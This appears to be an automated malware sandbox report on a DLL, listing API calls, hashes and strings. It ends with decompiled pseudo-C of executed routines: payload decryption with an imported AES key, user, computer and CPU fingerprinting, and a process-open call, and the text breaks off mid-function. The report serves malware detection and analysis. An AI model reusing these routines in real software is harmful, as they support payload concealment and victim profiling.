                                • API ID: Name::operator+$shared_ptr
                                • String ID:
                                • API String ID: 1037112749-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::DName.LIBVCRUNTIME ref: 6DD93B77
                                • DName::DName.LIBVCRUNTIME ref: 6DD93BA4
                                  • Part of subcall function 6DD91130: __aulldvrm.LIBCMT ref: 6DD91161
                                • DName::operator+.LIBCMT ref: 6DD93BBF
                                • DName::DName.LIBVCRUNTIME ref: 6DD93BDC
                                • DName::DName.LIBVCRUNTIME ref: 6DD93C0C
                                • DName::DName.LIBVCRUNTIME ref: 6DD93C16
                                • DName::DName.LIBVCRUNTIME ref: 6DD93C3D
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: NameName::$Name::operator+__aulldvrm
                                • String ID:
                                • API String ID: 4069495278-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 6DDB9A59: _free.LIBCMT ref: 6DDB9A7E
                                • _free.LIBCMT ref: 6DDB9DBC
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB9DC7
                                • _free.LIBCMT ref: 6DDB9DD2
                                • _free.LIBCMT ref: 6DDB9E26
                                • _free.LIBCMT ref: 6DDB9E31
                                • _free.LIBCMT ref: 6DDB9E3C
                                • _free.LIBCMT ref: 6DDB9E47
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6DDBD95D
                                • __fassign.LIBCMT ref: 6DDBDB3C
                                • __fassign.LIBCMT ref: 6DDBDB59
                                • WriteFile.KERNEL32(?,6DDB55A5,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DDBDBA1
                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DDBDBE1
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DDBDC8D
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                • String ID:
                                • API String ID: 4031098158-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __allrem.LIBCMT ref: 6DDA16CD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA16E9
                                • __allrem.LIBCMT ref: 6DDA1700
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA171E
                                • __allrem.LIBCMT ref: 6DDA1735
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA1753
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 6DDA2B50
                                • _free.LIBCMT ref: 6DDA2B6B
                                • _free.LIBCMT ref: 6DDA2B76
                                • _free.LIBCMT ref: 6DDA2C83
                                  • Part of subcall function 6DDAD792: RtlAllocateHeap.NTDLL(00000008,6DDCB004,00000000), ref: 6DDAD7D3
                                • _free.LIBCMT ref: 6DDA2C58
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDA2C79
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$Heap$AllocateErrorFreeLast
                                • String ID:
                                • API String ID: 4150789928-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBCMT ref: 6DD96B99
                                • DName::operator+.LIBCMT ref: 6DD96BA5
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                • DName::operator+=.LIBCMT ref: 6DD96C65
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD955CC
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD9588A
                                  • Part of subcall function 6DD9137E: DName::operator+.LIBCMT ref: 6DD9139F
                                • DName::operator+.LIBCMT ref: 6DD96C20
                                  • Part of subcall function 6DD914E7: DName::operator=.LIBVCRUNTIME ref: 6DD91508
                                • DName::DName.LIBVCRUNTIME ref: 6DD96C89
                                • DName::operator+.LIBCMT ref: 6DD96C95
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                • String ID:
                                • API String ID: 2795783184-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 6DD96CAB: Replicator::operator[].LIBVCRUNTIME ref: 6DD96CE8
                                • DName::operator=.LIBVCRUNTIME ref: 6DD959B9
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD955CC
                                  • Part of subcall function 6DD95561: DName::operator+.LIBCMT ref: 6DD9588A
                                • DName::operator+.LIBCMT ref: 6DD95974
                                • DName::operator+.LIBCMT ref: 6DD95980
                                • DName::DName.LIBVCRUNTIME ref: 6DD959CD
                                • DName::operator+.LIBCMT ref: 6DD959DC
                                • DName::operator+.LIBCMT ref: 6DD959E8
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                • String ID:
                                • API String ID: 955152517-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,?,6DD8F8E3,6DD8E4FE,6DD8DCB2), ref: 6DD8FB1A
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DD8FB28
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DD8FB41
                                • SetLastError.KERNEL32(00000000,?,6DD8F8E3,6DD8E4FE,6DD8DCB2), ref: 6DD8FB93
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: NameName::
                                • String ID: A
                                • API String ID: 1333004437-3554254475
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6DDB3251
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                • API String ID: 0-1872383224
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$InformationTimeZone
                                • String ID:
                                • API String ID: 597776487-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 6DDB97C0
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB97D2
                                • _free.LIBCMT ref: 6DDB97E4
                                • _free.LIBCMT ref: 6DDB97F6
                                • _free.LIBCMT ref: 6DDB9808
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 6DD90255
                                • CatchIt.LIBVCRUNTIME ref: 6DD9033B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: CatchEncodePointer
                                • String ID: MOC$RCC
                                • API String ID: 1435073870-2084237596
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __is_exception_typeof.LIBVCRUNTIME ref: 6DD8F458
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: __is_exception_typeof
                                • String ID: MOC$RCC$csm
                                • API String ID: 3140442014-2671469338
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _strrchr
                                • String ID:
                                • API String ID: 3213747228-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog3.LIBCMT ref: 6DD938EC
                                • UnDecorator::getSymbolName.LIBCMT ref: 6DD9397A
                                • DName::operator+.LIBCMT ref: 6DD93A7E
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                • DName::DName.LIBVCRUNTIME ref: 6DD93B3B
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
                                • String ID:
                                • API String ID: 334624791-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: AdjustPointer
                                • String ID:
                                • API String ID: 1740715915-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::DName.LIBVCRUNTIME ref: 6DD9401A
                                  • Part of subcall function 6DD91130: __aulldvrm.LIBCMT ref: 6DD91161
                                • DName::operator+.LIBCMT ref: 6DD94027
                                • DName::operator=.LIBVCRUNTIME ref: 6DD940A7
                                • DName::DName.LIBVCRUNTIME ref: 6DD940C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
                                • String ID:
                                • API String ID: 2448499823-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,?,?,6DDBDD5B,00000000,00000001,6DDB57FE,?,6DDBE22B,00000001,?,?,?,6DDB55A5,?,00000000), ref: 6DDADDFB
                                • _free.LIBCMT ref: 6DDADE58
                                • _free.LIBCMT ref: 6DDADE8E
                                • SetLastError.KERNEL32(00000000,6DDCB05C,000000FF,?,6DDBE22B,00000001,?,?,?,6DDB55A5,?,00000000,00000000,6DDCA818,0000002C,6DDB57FE), ref: 6DDADE99
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,?,?,6DDAD6F8,6DDB0144,?,?,6DD8DC30,?,?,6DD8C69D,000008DA,6DDCB004), ref: 6DDADF52
                                • _free.LIBCMT ref: 6DDADFAF
                                • _free.LIBCMT ref: 6DDADFE5
                                • SetLastError.KERNEL32(00000000,6DDCB05C,000000FF,?,?,?,6DDAD6F8,6DDB0144,?,?,6DD8DC30,?,?,6DD8C69D,000008DA,6DDCB004), ref: 6DDADFF0
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,6DD97510,00000000,?,00000001,?,?,6DD97643,00000001,6DD42674,6DD4266C,6DD42674), ref: 6DD974DF
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 08dff18af764a6ed295102061d1f1a034d85506a6a031c20a637a64bb655cff5
                                • Instruction ID: 66248582cefaa23e19f8216337dedcf8ddbb27700b9787d0b93b6c5cba66e2a3
                                • Opcode Fuzzy Hash: 08dff18af764a6ed295102061d1f1a034d85506a6a031c20a637a64bb655cff5
                                • Instruction Fuzzy Hash: 21118631E45622FBDB22BB689C44B6A3BBCAF42774F154610FE54EF282D771E90086D1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WriteConsoleW.KERNEL32(?,?,6DDB57FE,00000000,?,?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001), ref: 6DDC3B41
                                • GetLastError.KERNEL32(?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000,00000001,?,6DDBE24F,6DDB55A5), ref: 6DDC3B4D
                                  • Part of subcall function 6DDC3B13: CloseHandle.KERNEL32(6DDCB940,6DDC3B5D,?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000,00000001), ref: 6DDC3B23
                                • ___initconout.LIBCMT ref: 6DDC3B5D
                                  • Part of subcall function 6DDC3AD5: CreateFileW.KERNEL32(6DD47E28,40000000,00000003,00000000,00000003,00000000,00000000,6DDC3B04,6DDC299A,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000), ref: 6DDC3AE8
                                • WriteConsoleW.KERNEL32(?,?,6DDB57FE,00000000,?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000), ref: 6DDC3B72
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                • String ID:
                                • API String ID: 2744216297-0
                                • Opcode ID: 4167f758510ce01af4ea4aa259ac33567d36a713c1d902123440c6d2b1aa9b60
                                • Instruction ID: b61d9a5be7fa38cc9ba2420bb657b3409cce45d52c572b1d094abe135c3bbeff
                                • Opcode Fuzzy Hash: 4167f758510ce01af4ea4aa259ac33567d36a713c1d902123440c6d2b1aa9b60
                                • Instruction Fuzzy Hash: D7F0AC3654515ABBCF662F95CC08B9A3F7AEB0A3A1F054010FF1996160DB32D820EFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                • API String ID: 0-1872383224
                                • Opcode ID: 7f4c4d3ffb9c04bbd2d439ff0becbd9b38e84259d12fa8b832658a734e9b701d
                                • Instruction ID: 4a92dee888f142bc774ddc3dd79c1b01fae3a6a7bee27830d6aae2c846ada9dc
                                • Opcode Fuzzy Hash: 7f4c4d3ffb9c04bbd2d439ff0becbd9b38e84259d12fa8b832658a734e9b701d
                                • Instruction Fuzzy Hash: D7417671A04215EFDB21FB9BCC80D9EBFB9EB86318F19806AF50497241D7709A41C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __allrem.LIBCMT ref: 6DDA1207
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA122D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID: $KL
                                • API String ID: 1992179935-2900536411
                                • Opcode ID: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
                                • Instruction ID: 6d14439b4731b797c3e4b4c1402c5dc2db0a33a9128b350afe14205a032ea186
                                • Opcode Fuzzy Hash: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
                                • Instruction Fuzzy Hash: E211A172914218BEDB11FF68CC41FEE76B8EB82758F1AC469F441B7140D374AA408665
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                C-Code - Quality: 58%
                                			E046139C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				int _v8;
                                				long* _v12;
                                				int _v16;
                                				BYTE* _v20;
                                				long* _v24;
                                				void* _v39;
                                				char _v40;
                                				void _v56;
                                				int _v60;
                                				intOrPtr _v64;
                                				void _v67;
                                				char _v68;
                                				void* _t61;
                                				int _t68;
                                				signed int _t76;
                                				int _t79;
                                				int _t81;
                                				int _t85;
                                				long _t86;
                                				int _t90;
                                				signed int _t94;
                                				int _t101;
                                				BYTE* _t102;
                                				int _t103;
                                				void* _t104;
                                				void* _t105;
                                				void* _t106;
                                
                                				_t103 = __eax;
                                				_t94 = 6;
                                				_v68 = 0;
                                				memset( &_v67, 0, _t94 << 2);
                                				_t105 = _t104 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_v40 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				asm("stosb");
                                				_t61 =  *0x461a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                				if(_t61 == 0) {
                                					_a8 = GetLastError();
                                				} else {
                                					_t101 = 0x10;
                                					memcpy( &_v56, _a8, _t101);
                                					_t106 = _t105 + 0xc;
                                					_v60 = _t101;
                                					_v67 = 2;
                                					_v64 = 0x660e;
                                					_v68 = 8;
                                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                					if(_t68 == 0) {
                                						_a8 = GetLastError();
                                					} else {
                                						_push(0);
                                						_push( &_v40);
                                						_push(1);
                                						_push(_v12);
                                						if( *0x461a0b8() == 0) {
                                							_a8 = GetLastError();
                                						} else {
                                							_t18 = _t103 + 0xf; // 0x10
                                							_t76 = _t18 & 0xfffffff0;
                                							if(_a4 != 0 && _t76 == _t103) {
                                								_t76 = _t76 + _t101;
                                							}
                                							_t102 = E04616837(_t76);
                                							_v20 = _t102;
                                							if(_t102 == 0) {
                                								_a8 = 8;
                                							} else {
                                								_v16 = 0;
                                								_a8 = 0;
                                								while(1) {
                                									_t79 = 0x10;
                                									_v8 = _t79;
                                									if(_t103 <= _t79) {
                                										_v8 = _t103;
                                									}
                                									memcpy(_t102, _a12, _v8);
                                									_t81 = _v8;
                                									_a12 = _a12 + _t81;
                                									_t103 = _t103 - _t81;
                                									_t106 = _t106 + 0xc;
                                									if(_a4 == 0) {
                                										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                									} else {
                                										_t85 =  *0x461a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                									}
                                									if(_t85 == 0) {
                                										break;
                                									}
                                									_t90 = _v8;
                                									_v16 = _v16 + _t90;
                                									_t102 =  &(_t102[_t90]);
                                									if(_t103 != 0) {
                                										continue;
                                									} else {
                                										L17:
                                										 *_a16 = _v20;
                                										 *_a20 = _v16;
                                									}
                                									goto L21;
                                								}
                                								_t86 = GetLastError();
                                								_a8 = _t86;
                                								if(_t86 != 0) {
                                									E046150CA(_v20);
                                								} else {
                                									goto L17;
                                								}
                                							}
                                						}
                                						L21:
                                						CryptDestroyKey(_v12);
                                					}
                                					CryptReleaseContext(_v24, 0);
                                				}
                                				return _a8;
                                			}

                                APIs
                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04614A23,00000001,046170D9,00000000), ref: 046139FD
                                • memcpy.NTDLL(04614A23,046170D9,00000010,?,?,?,04614A23,00000001,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000), ref: 04613A16
                                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04613A3F
                                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04613A57
                                • memcpy.NTDLL(00000000,00000000,053C9630,00000010), ref: 04613AA9
                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,053C9630,00000020,?,?,00000010), ref: 04613AD2
                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,053C9630,?,?,00000010), ref: 04613AE9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 04613B01
                                • GetLastError.KERNEL32 ref: 04613B33
                                • CryptDestroyKey.ADVAPI32(00000000), ref: 04613B3F
                                • GetLastError.KERNEL32 ref: 04613B47
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04613B54
                                • GetLastError.KERNEL32(?,?,?,04614A23,00000001,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 04613B5C
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                • String ID:
                                • API String ID: 1967744295-0
                                • Opcode ID: 7b7e0b48c1f3c21cf3b02ed2c67a4d7127030ab197ea4cd11118219268adb288
                                • Instruction ID: a9948c46f6967b3ec7bf16ddc05f4f7befc7abb22212e6e9648393c5af00c568
                                • Opcode Fuzzy Hash: 7b7e0b48c1f3c21cf3b02ed2c67a4d7127030ab197ea4cd11118219268adb288
                                • Instruction Fuzzy Hash: 4E515171900208FFEF10DFA5D884EAEBBB9EB14355F08842AF905E6260F7759E54DB21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E04614454(char __eax, signed int* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t63;
                                				signed int* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				signed int* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x461a2c8; // 0xbd092303
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E0461143F( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x461a2d0 ^ 0x4c0ca0ae;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x461a290, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t63 = _t62;
                                								 *_t69 =  *_t69 ^ E0461283A(_v8 + _v8, _t63);
                                							}
                                							HeapFree( *0x461a290, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x461a290, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t63 = _t68;
                                							_t69[3] = _t69[3] ^ E0461283A(_v8 + _v8, _t63);
                                						}
                                						HeapFree( *0x461a290, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *(_t67 + 8) = _t63;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				_t69[1] = _t69[1] ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,046155CE), ref: 0461448B
                                • RtlAllocateHeap.NTDLL(00000000,046155CE), ref: 046144A2
                                • GetUserNameW.ADVAPI32(00000000,046155CE), ref: 046144AF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,046155CE,?,?,?,?,?,04616BD8,?,00000001), ref: 046144D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046144F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0461450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04614518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04614536
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: db5b9ca4e828bda34eb45b386cd6e289acfc2faf2c7251191ab7465835adfda9
                                • Instruction ID: 317342ee9c8414c1bcf9e7d04f4b3f0eeac6932016f623d63aac6d4bd46af9ca
                                • Opcode Fuzzy Hash: db5b9ca4e828bda34eb45b386cd6e289acfc2faf2c7251191ab7465835adfda9
                                • Instruction Fuzzy Hash: F3311972A00209AFDB11DFA9D980A6EB7F9FF58714F19446AE545D3220EB39EE04DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 38%
                                			E04612D06(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
